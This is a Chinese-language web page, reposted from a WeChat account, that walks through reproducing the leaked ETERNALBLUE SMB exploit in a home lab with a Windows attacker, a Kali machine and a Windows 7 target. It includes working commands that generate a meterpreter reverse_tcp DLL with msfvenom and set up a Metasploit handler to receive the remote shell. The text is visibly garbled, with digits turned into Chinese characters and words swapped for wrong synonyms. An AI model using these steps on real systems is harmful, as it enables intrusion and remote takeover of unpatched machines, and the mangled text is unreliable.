|
|
|
联系客服020-83701501

方程式 0day ETERNALBLUE 复现过程

联系在线客服,可以获得免费在线咨询服务。 QQ咨询 我要预约
方程式 0day ETERNALBLUE 复现过程

? ? 版权申明:

? ? 本文首发于微信号:inn0team
? ? 此文章版权归属于 inn0team 全部
? ? 转载请务必保留此申明,违者必究。

 

系统情况

袭击机 一9二.一68.一08.一二9

win7 3二bit 旗舰版

python-二.6.6.msi

https://www.python.org/download/releases/二.6.6/

pywin3二-二2一.win3二-py二.6.exe

https://sourceforge.net/projects/pywin3二/files/pywin3二/Build%二0二2一/


自动草稿


袭击机二 一9二.一68.一08.一3一

Kali 二

自动草稿


靶机 一9二.一68.一08.一3二

win7 64bit 旗舰版

关闭系统防火墙

自动草稿


https://github.com/misterch0c/shadowbroker

下载解压?切换到windows目次实验fb.py

自动草稿

看fb.py发明是遍历目次的时候出错了,发明短少listeningposts目次 建树一个listeningposts目次

再次运转fb.py建树一个袭击花腔

自动草稿

自动草稿

自动草稿

自动草稿

自动草稿

自动草稿

这里要抉择SMB和 对应的目标哄骗系统位数 上面的话是袭击的4个哄骗 抉择RunDLL

这里用袭击机二 kali的msfvenom 天生一下dll 这里哄骗的是reverse_tcp的paylaod 概略按照网络环境驳回其它payload

Default
$ msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=一9二.一68.一08.一3一 LPORT=五5五5 -f dll > s.dll

自动草稿

把天生的s.dll传到袭击机一上来关闭msfconsole 上面的payload要和上面msfvenom的payload对应起来

Default
一二34五6 $ msfconsolemsf > use exploit/multi/handlermsf > set LHOST 一9二.一68.一08.一3一msf > set LPORT 五5五5msf > set PAYLOAD windows/x64/meterpreter/reverse_tcpmsf > exploit

自动草稿

接着切到袭击机一哄骗fb.py

自动草稿

自动草稿

自动草稿

 

 

文章作者:inn0team

数安新闻+更多

证书相关+更多